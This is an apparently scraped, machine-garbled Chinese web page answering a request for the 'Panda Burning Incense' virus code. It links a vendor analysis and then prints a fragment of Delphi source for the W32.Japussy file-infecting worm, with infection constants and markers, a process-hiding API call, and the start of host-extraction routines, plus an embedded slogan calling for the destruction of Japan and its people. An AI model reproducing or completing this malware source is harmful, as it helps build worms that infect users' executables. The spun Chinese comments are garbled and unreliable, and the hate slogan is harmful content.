设为首页 - 加入收藏 织梦模板之家(),专注织梦模板设计制作!
热搜: 粤剧 传统 根底
广告位
当前位置: 主页 > 博狗手机版 >

拥有没拥有拥有李俊“熊猫烧香”病毒的代码呀

2018-10-27 07:22 [博狗手机版] 来源于:未知
导读:“熊猫烧香”病毒是用DELPHI写的,并不是C++ 此雕刻边是瑞星的剖析报告 http://it.rising.com.cn/Channels/Info/Virus/2007-01-12/1168575524d39892.shtml 以下是片断源码 **************************************** prog

  “熊猫烧香”病毒是用DELPHI写的,并不是C++

  此雕刻边是瑞星的剖析报告

  http://it.rising.com.cn/Channels/Info/Virus/2007-01-12/1168575524d39892.shtml

  以下是片断源码

  ****************************************

  program Japussy;

  uses

  Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

  const

  HeaderSize=82432; //病毒体的父亲小

  IconOffset=$12EB8; //PE文件主图标注的偏移量

  //在Delphi5 SP1下面编译违反掉落的父亲小,其它版本的Delphi能不一

  //查找2800000020的什六进制字符串却以找到主图标注的偏移量

  {

  HeaderSize=38912; //Upx紧收缩度过病毒体的父亲小

  IconOffset=$92BC; //Upx紧收缩度过PE文件主图标注的偏移量

  //Upx 1.24W 用法: upx -9 --8086 Japussy.exe

  }

  IconSize=$2E8; //PE文件主图标注的父亲小--744字节

  IconTail=IconOffset + IconSize; //PE文件主图标注的条部

  ID=$44444444; //传染标注识表记标注帜

  //渣滓码,以备写入

  Catchword='If a race need to be killed out, it must be Yamato. ' +

  'If a country need to be destroyed, it must be Japan! ' +

  '*** W32.Japussy.Worm.A ***';

  {$R *.RES}

  function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

  stdcall; external 'Kernel32.dll'; //函数音皓

  var

  TmpFile: string;

  Si: STARTUPINFO;

  Pi: PROCESS_INFORMATION;

  IsJap: Boolean=False; //日文操干体系标注识表记标注帜

  { 判佩能否为Win9x }

  function IsWin9x: Boolean;

  var

  Ver: TOSVersionInfo;

  begin

  Result :=False;

  Ver.dwOSVersionInfoSize :=SizeOf(TOSVersionInfo);

  if not GetVersionEx(Ver) then

  Exit;

  if (Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS) then //Win9x

  Result :=True;

  end;

  { 在流动之间骈制 }

  procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

  dStartPos: Integer; Count: Integer);

  var

  sCurPos, dCurPos: Integer;

  begin

  sCurPos :=Src.Position;

  dCurPos :=Dst.Position;

  Src.Seek(sStartPos, 0);

  Dst.Seek(dStartPos, 0);

  Dst.CopyFrom(Src, Count);

  Src.Seek(sCurPos, 0);

  Dst.Seek(dCurPos, 0);

  end;

  { 将宿主文件从已传染的PE文件中佩退出产到来,以备运用 }

  procedure ExtractFile(FileName: string);

(编辑:admin)

网友评论
无法在这个位置找到: ajaxfeedback.htm
推荐文章
广告位
广告位
广告位